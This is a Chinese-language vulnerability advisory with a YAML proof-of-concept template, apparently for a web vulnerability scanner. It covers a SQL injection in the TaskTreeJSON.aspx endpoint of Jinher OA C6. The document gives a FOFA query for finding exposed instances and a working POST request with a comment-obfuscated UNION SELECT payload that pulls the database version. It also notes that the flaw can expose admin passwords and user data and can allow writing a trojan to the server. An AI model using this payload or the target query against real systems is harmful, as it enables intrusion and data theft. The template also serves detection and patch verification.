漏洞描述
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和OA C6 TaskTreeJSON.aspx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
FOFA: app="金和网络-金和OA"
jinhe-oa-tasktreejson-sqli: 金和OA TaskTreeJSON.aspx SQL注入漏洞
PoC代码[已公开]
id: jinhe-oa-tasktreejson-sqli
info:
name: 金和OA TaskTreeJSON.aspx SQL注入漏洞
author: AVIC123
severity: high
verified: true
description: |-
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和OA C6 TaskTreeJSON.aspx 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
FOFA: app="金和网络-金和OA"
reference:
- https://cn-sec.com/archives/4333835.html
tags: jinhe,oa,sqli
created: 2025/08/06
rules:
r0:
request:
method: POST
path: /c6/Jhsoft.Web.dailytaskmanage/TaskTreeJSON.aspx/
headers:
Content-Type: application/x-www-form-urlencoded
body: |
id='/**/UniOn/**/all/**/SelECt/**/NULL,@@verSion,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
expression: response.status == 200 && "Microsoft SQL Server".bmatches(response.body)
expression: r0()